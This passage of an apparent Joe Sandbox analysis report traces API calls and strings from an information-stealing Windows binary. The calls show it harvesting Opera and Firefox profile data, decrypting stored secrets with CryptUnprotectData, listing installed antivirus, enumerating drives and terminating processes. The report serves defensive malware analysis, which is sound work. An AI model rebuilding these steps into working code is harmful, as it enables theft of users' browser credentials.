Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,004201E9,00000000,?,?), ref: 0040A322
StrCmpCA.SHLWAPI(?,004201DC), ref: 0040A34C
StrCmpCA.SHLWAPI(?,004201D8), ref: 0040A366
StrCmpCA.SHLWAPI(00000000,Opera,004201E9,004201E9,004201E9,004201E9,004201E9,004201E9,004201E9), ref: 0040A3DD
StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A3F1
StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A405

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D

Part of subcall function 00409D40: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,004201E9,?,75AFAC90,?), ref: 00409D8B
Part of subcall function 00409D40: StrCmpCA.SHLWAPI(?,004201DC), ref: 00409DAE
Part of subcall function 00409D40: StrCmpCA.SHLWAPI(?,004201D8), ref: 00409DC8

FindNextFileA.KERNEL32(?,?), ref: 0040A984

Strings

Opera Crypto, xrefs: 0040A3F7
1#v, xrefs: 0040A322
\*.*, xrefs: 0040A2D9
P2#v, xrefs: 0040A984
Opera, xrefs: 0040A3CF
Opera GX, xrefs: 0040A3E3

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$Find$Firstlstrcat$AttributesNextlstrlen
String ID: Opera$Opera Crypto$Opera GX$P2#v$\*.*$1#v
API String ID: 3824151033-978719237
Opcode ID: e44a3a0c94b49c6a3fd2b09190ddcc4d0c627d18eb0f45bc393314862995086d
Instruction ID: c055696588133eeff082df826d79585fe0f613ba782fed39e499d95d60d79d7b
Opcode Fuzzy Hash: e44a3a0c94b49c6a3fd2b09190ddcc4d0c627d18eb0f45bc393314862995086d
Instruction Fuzzy Hash: 5A1233729101086BCB28FB71DC52EED7378AF54704F40857EB506729D2EF786A4CCAA9

Function 0040B390 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 283fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004234C0,004201E9,00000000,?,?), ref: 0040B3F2
StrCmpCA.SHLWAPI(?,004201DC), ref: 0040B41C
StrCmpCA.SHLWAPI(?,004201D8), ref: 0040B436
StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,004201E0,?,?,004201E9), ref: 0040B4B0

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,024F8CF0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B562
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040B59A
DeleteFileA.KERNEL32(00000000,?,004201E9), ref: 0040B63E

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1

FindNextFileA.KERNELBASE(00000000,?), ref: 0040B6F5
FindClose.KERNEL32(00000000), ref: 0040B704

Strings

prefs.js, xrefs: 0040B4A4
1#v, xrefs: 0040B3F2
P2#v, xrefs: 0040B6F5

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$FindProcess$CloseCopyHeaplstrcat$AllocDeleteFirstHandleNextOpenSystemTerminateTimelstrlenmemsetwsprintf
String ID: P2#v$prefs.js$1#v
API String ID: 874672723-2885088814
Opcode ID: 58096f63881a2948a74062516666b8d5a916b4f522506a911d1859a642312633
Instruction ID: 4260c9570d047cb4ee5d2090f2cf981c79b292f60dd583d0dc47953d2b0846df
Opcode Fuzzy Hash: 58096f63881a2948a74062516666b8d5a916b4f522506a911d1859a642312633
Instruction Fuzzy Hash: C2A11E72910108ABCB24FB71DC56AEE7778AF54304F40853EE905B35D2EF386A4DCA99

Function 004153C0 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 161stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 0041541D
memset.MSVCRT ref: 0041543E
GetDriveTypeA.KERNEL32(00000000,?,?,00000000), ref: 00415447
lstrcpyA.KERNEL32(?,00000000,?,?,00000000), ref: 00415466
lstrcpyA.KERNEL32(?,00000000,?,?,00000000), ref: 00415484
lstrcpyA.KERNEL32(?,00000000,?,?,?,?,?,00000000), ref: 004154A7
lstrlenA.KERNEL32(00000000), ref: 0041550E

Strings

*%DRIVE_FIXED%*, xrefs: 004153CF
%DRIVE_FIXED%, xrefs: 0041548B
%DRIVE_REMOVABLE%, xrefs: 0041546D
*%DRIVE_REMOVABLE%*, xrefs: 004153EE
pVA, xrefs: 00415572, 004155AC, 004154F7, 004154FC, 00415577

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$Drive$LogicalStringsTypelstrlenmemset
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$pVA
API String ID: 1884655365-1202875852
Opcode ID: a15a48885c9e95e0af7cde5ac2a87ce2fdea729cbfa79c02cc594fb5a6742aa2
Instruction ID: bbf7442ac75b1dedefd6e11ab23fcaa94ebd49349dc0b1136d9cad4923d5d44c
Opcode Fuzzy Hash: a15a48885c9e95e0af7cde5ac2a87ce2fdea729cbfa79c02cc594fb5a6742aa2
Instruction Fuzzy Hash: 87516671600244ABDB70FF71DC86FEE3369AF44704F50803AFA0966192DF786A49CB69

Function 004099F0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 251fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004234C0,004201E9,?), ref: 00409A50
StrCmpCA.SHLWAPI(?,004201DC), ref: 00409A6D
StrCmpCA.SHLWAPI(?,004201D8), ref: 00409A87
StrCmpCA.SHLWAPI(?,0251D7F0,00000000,?,?,?,004201E0,?,?,004201E9), ref: 00409B03
StrCmpCA.SHLWAPI(?,0251E010), ref: 00409B69

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00408DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408E75
Part of subcall function 00408DD0: CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00408EAA

FindNextFileA.KERNELBASE(00000000,?), ref: 00409CDF
FindClose.KERNEL32(00000000), ref: 00409CEE

Strings

1#v, xrefs: 00409A50
P2#v, xrefs: 00409CDF

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$Find$Copylstrcat$CloseFirstNextlstrlen
String ID: P2#v$1#v
API String ID: 1309316030-762677545
Opcode ID: 0ba26bfa0c506a7a61728fe72aaece1d33be5286091eb5358686cd9ad949d485
Instruction ID: 9bfd207ce50c0c1877f45400523c984a60adf101312f3de179d0de13c9639d5b
Opcode Fuzzy Hash: 0ba26bfa0c506a7a61728fe72aaece1d33be5286091eb5358686cd9ad949d485
Instruction Fuzzy Hash: EB911F72900108A7CB24FB71DC569EE777DAB44744F40863EF902A29D6EF789A0C8695

Function 00410900 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 141comCOMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410928
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000), ref: 00410939
CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?), ref: 00410953
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?), ref: 0041098C
VariantInit.OLEAUT32(?), ref: 004109E3

Part of subcall function 00410CF0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00410A09,00000030,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000), ref: 00410CF8
Part of subcall function 00410CF0: CharToOemW.USER32(?,00000000), ref: 00410D05

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

VariantClear.OLEAUT32(?), ref: 00410A1B

Strings

Select * From AntiVirusProduct, xrefs: 004109A1
displayName, xrefs: 004109F5
WQL, xrefs: 004109A6
Unknown, xrefs: 00410A3E
root\SecurityCenter2, xrefs: 0041096B

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 685420537-2561087649
Opcode ID: 14c2aef3a591fd2902ff4a17e71782beafdfaa6366ad45fd69ac525a9770b687
Instruction ID: 111392f2127a0d2122f17b414c1528a281c0ab609e0c548076d9d5dfd58a5577
Opcode Fuzzy Hash: 14c2aef3a591fd2902ff4a17e71782beafdfaa6366ad45fd69ac525a9770b687
Instruction Fuzzy Hash: A9415F71A01225ABCB20DB95DC45EEFBBBCEF49B60F10421AF515A7280C775AA41CBA4

Function 0040FC30 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

GetKeyboardLayoutList.USER32(00000000,00000000,004201E9,00000000,?,00000030), ref: 0040FC4D
LocalAlloc.KERNEL32(00000040,00000000,?,00000030), ref: 0040FC5F
GetKeyboardLayoutList.USER32(00000000,00000000,?,00000030), ref: 0040FC69
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000030), ref: 0040FC93

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

LocalFree.KERNEL32(00000000,?,00000030), ref: 0040FD16

Strings

/ , xrefs: 0040FCAB

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
String ID: /
API String ID: 507856799-4001269591
Opcode ID: 500ee8c08f20458fefc98cf924f39d9b0c0729083dc0d2baae009b1d1f0a3f5e
Instruction ID: 0df51f6c7c38cdc7b73c36f3f29490646fb89a6b7ce8503a4d5a956f8c487b71
Opcode Fuzzy Hash: 500ee8c08f20458fefc98cf924f39d9b0c0729083dc0d2baae009b1d1f0a3f5e
Instruction Fuzzy Hash: 13218271500218BBDB20EBA1DC86EEE777DEF88700F40513AFA05661C1DF789949CBA4

Function 0040FBC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FBD1
HeapAlloc.KERNEL32(00000000), ref: 0040FBD8
GetTimeZoneInformation.KERNEL32(?), ref: 0040FBE7
wsprintfA.USER32 ref: 0040FC12

Strings

wwww, xrefs: 0040FBF8

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID: wwww
API String ID: 362916592-671953474
Opcode ID: a671d90642e18a916263cb03e8fa96a413124f80aca2b8089fefbc7501649321
Instruction ID: fbce99371d8f23c69195bcece4cb59d5ef7dd42c2aed0f13d542024a30712026
Opcode Fuzzy Hash: a671d90642e18a916263cb03e8fa96a413124f80aca2b8089fefbc7501649321
Instruction Fuzzy Hash: 1EF02770B00218ABD71C3B78AC0EE6A3B6EAB81311F041365FF06CA2C0DB704C104AD1

Function 004112F0 Relevance: 7.6, APIs: 5, Instructions: 61processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411329
Process32First.KERNEL32(00000000,00000128), ref: 00411339
Process32Next.KERNEL32(00000000,00000128), ref: 0041134B
StrCmpCA.SHLWAPI(?,?), ref: 00411360
CloseHandle.KERNEL32(00000000), ref: 00411385

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: be8fff6f84b892f8d85d2b578ecce69cb58c0f85215eb4f569bb4dc899e8e412
Instruction ID: 3ee263357de7356a118a80b25b2dae21b26717c0aa6c402fa6d9d07f030b476f
Opcode Fuzzy Hash: be8fff6f84b892f8d85d2b578ecce69cb58c0f85215eb4f569bb4dc899e8e412
Instruction Fuzzy Hash: 70114C75A01618AFDB10DF98DC45BEEB7BCFB49761F0042AAE919E3680D7345A00CBA5

Function 00411400 Relevance: 7.6, APIs: 5, Instructions: 53processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411439
Process32First.KERNEL32(00000000,00000128), ref: 00411449
Process32Next.KERNEL32(00000000,00000128), ref: 0041145B
StrCmpCA.SHLWAPI(?,00423EE4), ref: 00411470
FindCloseChangeNotification.KERNEL32(00000000), ref: 00411482

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 2625226fddd4da006d26e06fdee4ba1bf4f4a11824d8d051c31eb45bd74834d2
Instruction ID: f304eba33368e90d87c3244fdfdafea8657fd46212b62d22af59a709f315db57
Opcode Fuzzy Hash: 2625226fddd4da006d26e06fdee4ba1bf4f4a11824d8d051c31eb45bd74834d2
Instruction Fuzzy Hash: 83110472944218AFC710CF94DC45BEBBBBCFB06B00F00916AFA0593240DB384A04CBE4

Function 00406D50 Relevance: 4.5, APIs: 3, Instructions: 47memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(0040EC94,00000000,00000000,00000000,00000000,00000000,?), ref: 00406D75
LocalAlloc.KERNEL32(00000040,?,00000000), ref: 00406D8D
LocalFree.KERNEL32(?), ref: 00406DAE

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
